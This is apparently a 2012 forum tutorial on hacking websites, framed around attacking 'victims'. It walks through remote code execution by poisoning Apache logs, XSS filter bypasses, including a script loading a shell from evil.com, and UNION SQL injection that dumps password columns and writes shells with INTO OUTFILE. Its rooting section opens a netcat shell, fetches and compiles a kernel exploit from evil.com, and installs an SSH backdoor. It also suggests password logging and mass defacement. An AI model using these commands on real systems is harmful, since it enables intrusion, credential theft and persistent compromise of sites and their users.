[align=center]I cover most methods in this tutorial, but you are guaranteed to learn something new. Just take a glance at each section!
Methods Covered:
■RCE P1/P2
■XSS
■SQL P1/P2
■Rooting[/align]
-- RCE //
RCE: Remote Code Execution
Definition: We use this attack to retrieve code or information about the site using the proper programming syntax (in our case, PHP). We could download stuff, we can make dirs, we can rm dirs; overall, just a load() of fun.
This attack is somewhat of a shell execution backdoor, if you find a site that is vulnerable to this security disclosure, then chances are you will get full access to the website that pertains it.
This attack is executable through Netcat or telnet; today we will be discussing the whereabouts and howto's of telnet.
Starting off, we are going to connect to our target, the site's I.P address can be determined via ping. Once we find our target, we are going to head over to command prompt and insert the following:
telnet 127.0.0.1 80
"Why Port 80?", we are connecting to port 80 because that is where the vulnerable path lies, it is also our order of execution for RCE
Now we are going to use the GET method to read from our directory (bak.php?page=) , after completetion, we will have to insert our PHP syntax to complete the request. For testing purposes, we will use a simple echo resemblance:
Code:
GET bak.php?page=< ?php system( $_GET[foo] ); ?>
If the code snippet is right, "foo", could be a valid variable and we could use it as a backdoor for getting into the website. If it is a standard Linux box, you can use something like this to make an account:
Code:
useradd foo
passwd .
But we are going to set our focus on poisoning Apache logs and executing from our variable (which is a valid value/perimeter), we know the current box is running on Windows so our command syntax will include net user, lets begin! :
Code:
localhost/bak.php?page=../../apache/logs/access.log&foo=net user%20AliEmre%20password
%20/add
What we do in this example is practically poison logfiles, we then go on and read from our foo variable and make a request from it. Now your probably thinking, "How do I know if the account is actually there?" You can use net user username, example:
Code:
localhost/bak.php?page=../../apache/logs/access.log&foo=net%20user%20foo
If you get some Windows information back with account statistics, you are successful! But now your thinking, "what the fuck? I want to access this!", here is how:
1 ) Contact the webmaster via contact feature
2 ) Tell him about an invalid package or bummed out application
3 ) Link him to
http://gnuwin32.sourceforge.net/packages/wget.htm or your own personally upped wget package
4 ) (IF) He install's it on the proper RDP/Computer, you can now begin your attack!
5 ) Type dir in ../../apache/logs/access.log&=foo
6 ) Move back to discover domain selection (lists all domains in order); once found go to the public_html or ~www dir
7 ) Once your prime location is on the target, wget a infected program/shell (infected program requires talking the admin into running the file)
8 ) Once you get your shell up, go to localhost/shellname.php
Attempting to infect the admin is more of a result bash though, if you are successful you can get all the results and passwords for everything the administrator has to offer (Hosting accounts, Email Address, WAP Key/PPPoE Modem GUI access, etc, etc.
-- RCE P2 //
If you want to inject this attack through the web browser, this is for you. Once again, our vulnerable path lies around /bak.php?page=, so what we need to do is include our PHP syntax. In this case we will simply try to get a "echo" response from the web server.
Code:
localhost/bak.php?page=<?php echo “foo”; ?>
We get no response from the server ] :, our best guess is that:
1 ) They have escapecmdshell on
2 ) magic_quotes = ON
3 ) PHP filtered/chars escaped (if this is in play, it would just read our request as php echo foo?, therefore we aren't really making a proper GET request to the website, we are just inserting an invalid query.
But there is a bypass to this, you can use URL encoding to escape proper file fragment/protection:
Code:
localhost/bak.php?page=%3C%3Fphp%20echo%20%E2%80%9Cdeneme%E2%80%9D%3B%20%3F%3E
This works because we have no special characters in play, and our request is still in play considering these are simple URL encodes and most sites read it when GET/POST variables are being transferred through the data stream. Another reason being so is because if we make invalid requests on a filtered/patched website, sometimes it can respond with a %3C or %80 (encoded result) .
-- XSS //
XSS: Cross Site Scripting (X=crossed, S=site, S=scripting)
Definition: This is commonly a client-side attack but if embedded correctly in the source it could cause permanent damage to your website (mainly persistent XSS and/or XSS Shells).
This attack just brightens up every month you see it in action. What we do with this attack is simply use Javascript to evade website orders, so for example, if we wanted Bob's user agent information, we could use our very own XSS Shell to gather not only the user agent information, but his cookies!
Starting off, if you want to identify vulnerable sectors quickly, once you broaden your attack, view the source for combinations of <XSS or <XSS, if it results in <:XSS, then that means your request was filtered. All you really have to do is look for the finalized result, which in our case was <script>alert("XSS");</script>
But this doesn't stop some people, some sites have basic filters such as:
1 ) Character evasion (<script src, etc)
2 ) <script> or any other Java relation blocked
3 ) Character(s) escaped
With a simple URL encode, we could bypass this filter, an example being:
Code:
localhost/search.php?res=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E
Our request is encoded but remains readable by the web server's GET/Auth system. What this does is bypass basic filters (mainly character escalation);
If this still doesn't work, its probably frustrating you but you could try reading from img src that pertains your Javascript request, example:
Code:
<IMG SRC="javascript:alert('XSS')"
If it has Character evasion as a filter, we can bypass this quite easily because there are alternatives is <script> is blocked, but in this case we will concentrate on successfuly including our XSS Shell:
Code:
<SCRIPT a=">" SRC="http://evil.com/evil/shell.asp"></SCRIPT>
If vulnerable, its going to be embedded in the source and everytime a victim visits, logs get transferred to the index page for the admin portal.
-- SQL Injection //
Definition: SQL injection is commonly used to steal cached databases, from there, you can use Base64 values to input a shell via INTO outfile, or you can use load_file to discover results in dirs (/etc/passwd/ for example) .
Starting off, we need to use ' to make our error evaluate:
Code:
localhost/index.php?id='1
Be sure the number your connecting your ' with has correct values and input perimeters.
If you get an error familiar to:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "/" at line 1
Then that's usually a sign of protection. What you need to do now is find out the number of columns, you can do this by using the order by -- statement in MySQL:
Code:
localhost/index.php?page=-1 ORDER BY 1-- No Error
localhost/index.php=-1 ORDER BY 2-- No Error
localhost/index.php=-1 ORDER BY 3-- No Error
localhost/index.php=-1 ORDER BY 4-- No Error
localhost/index.php=-1 ORDER BY 5-- Error!
This means the number of columns are 4 (because 5 would just output an error if we used MySQL statements) .
Now we need to find the accessible columns, we can do this by using the union all select -- statement:
Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,2,3,4--
Now you should get a clear response with the results, if you don't, you can try viewing the source or hovering over images to be sure it wasn't inserted there.
Accessible Columns : 2, 1, 3
Now we need to find out the version, we can use either column 2, 1 or 3 to identify this, in this case we will be reading from column 3:
Code:
localhost/index.php?page=-1 UNION SELECT 1,@@version,3,4--
The output was: 5.0.77, >5 = vulnerable, we can use information_schema to get the table information. If its running >4, you might have to brute force the table names.
Now we need to identify all the tables, we can do this by using group_concat to return the strings, or you can just use table_name to get all the inputs back. In our case though, we are going to use a simple table_name to retrieve our results, what this tells the database is to grab all table_names from information_schema. If we were using group_concat, it would be nearly the same but slightly different.
Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables--
Now you should get a response with all the table names, after this we could simply include a syntax such as: -1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=dbname-- but if we did that, we would have to guess the columns, instead we could use ASCII and char to broaden our attack and get the columns enlisted as well, an example being (using dbname text):
[code]localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=char(100,98,110,97,109,101)--
100, 98, 110, 97, 109 and 101 are the ASCII code of dbname, when using Convert text applications be sure to remove the &#'s, ;'s, etc, etc.
Now we should get a response with the columns in the table we selected, for example, lets say it was this:
user_pass
email
msn
aim
To take advantage of this and read from the column, use this:
Code:
localhost/index.php?page=-1 UNION ALL SELECT 1,concat(user_pass,0x3a,email)3,4 from dbname
We use concat to return the strings, we use 0x3a which decodes as :, this is useful if you are in quite large databases.
SQL Injection -- Part 2
If you want to get a shell up in public_html/root directory/~www, you can do it using the "INTO outfile" statement in MySQL
Code:
localhost/index.php?page=-1 union select 'BASE64 VALUE' INTO OUTFILE 'prime location'
We have to include a base64/ASCII encoded shell in the "Base64 Value" section, there are custom made shells for this you can find online. And prime location should be changed with where you want the path of the file to be.
This only works if you have FILE permission though.
SQL Injection - Part 3
If you want to gather information from dirs/files, you can use the load_file statement. Example being:
Code:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
You have to have access to mysql.user, magic_quotes has to be off, and you have to have acknowledgement of the path.
You could also try accessing the file via hex value:
Code:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
Hex Values/ASCII code help bypass a lot of filters most webmasters have set!
-- Rooting //
Rooting is probably one of the most undiscussed hacking technique ever. All you ever see on blogs/news nowadays is about stolen user accounts, serious infections, etc, etc. Rooting is a guideline that takes you to a whole new level, once you get root you have a high #UID and you can also sell your work on the black-market, its very serious but not discussed a lot.
Starting off, get a PHP shell up on your victim's site. Now what you need to do is use the back connect function, I'd recommend using a nonused port on the service because you don't want your connections to be firewalled (if one port attempts to halt the other, its usually firewalled), port 8080 is pretty good for back connection. Warning: Port Forwarding MIGHT be required.
Starting off, install netcat for Windows here:
Code:
http://joncraton.org/files/nc111nt.zipMove all the files in one folder on your desktop or documents, once completed go to command prompt and find it via cd ../ and cd and then run it via process name.
You have 2 choices, you can just use the back-connection feature in shells, or you can use the command execution section. I prefer using the command execution area because BC is buggy because the server will just firewall all your BC traffic.
Requirement: You might need a precompiled NC, you can host it on freehostia, be sure its for *nix or whatever box its running, once you get it on your freehostia site, go to command execution and wget it, then chmod +x name (Where name is, be sure you only put the last URL syntax, so for example, if it was john4.freehostia/nc, only include chmod +x nc)
Once in the command execution area, type in:
Code:
./nc -l -p 8080 -e /bin/sh
Now on your machine (while in command prompt), type in:
[code]nc VicIP 8080/code]
Once you get your shell spawned, use uname -a;id to discover some information on the server that is running. Once you get an idea of the layout/server information, look for an exploit for it. Once you find your exploit, use the wget function to make server contact, example:
Code:
wget
http://www.evil.com/xpl.cNow we need to make an output and make it accessible for all users, to do this, we will use gcc (to compile our file and make an output) and chmod (to make it accessible for anyone):
Code:
gcc xpl.c -o xpl;chmod +x xpl
gcc xpl.c -o xpl : We use this to compile our file and make an output (in this case, xpl).
chmod +x xpl : We use this to make our file accessible (it gives the attacker permission to run the script)
Once completed, type in:
Code:
./xpl
Once your script is ran, type in whoami to find out what user you are, you can also use id to discover what uid your under, what group your in, etc, etc. Example:
Code:
uid=0(root) gid=0(root) groups=450(apache)
Now you can add an sshdoor via:
Code:
http://www.pacenoge.org/tool/sshdoor.tar.gzexample : ./install passwd port
./install jancok 33
open putty
ssh port : 33 login : root password : jancok
[root@serv1 ~]# uname -a;id
Linux serv1.sex.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
[root@serv1 ~]#
Where can you go from here? You can setup a password logger on processlogin to get some passwords, you can use wall <script>alert('hi')</script> to steal cookies in the SSH session, you can setup a pl script to mass deface all the sites on the box, etc, etc. Have fun.
Subject: WEB hkng tutorial 
Fri Feb 03, 2012 1:58 am
